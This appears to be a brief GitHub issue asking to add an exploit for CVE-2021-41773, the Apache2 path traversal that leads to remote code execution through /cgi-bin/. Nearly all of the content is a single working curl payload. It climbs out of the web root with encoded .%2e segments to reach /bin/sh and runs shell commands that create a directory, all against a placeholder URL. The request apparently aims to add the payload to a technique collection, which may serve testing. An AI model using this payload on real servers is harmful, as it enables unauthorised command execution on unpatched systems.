[add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/

Question

[add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/

wlayzz opened this issue 3 years ago · 0 comments

Adding rce technique on apache2, payload:
curl "http://url.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" --data 'echo Content-Type: text/plain; echo; mkdir /tmp/poda/'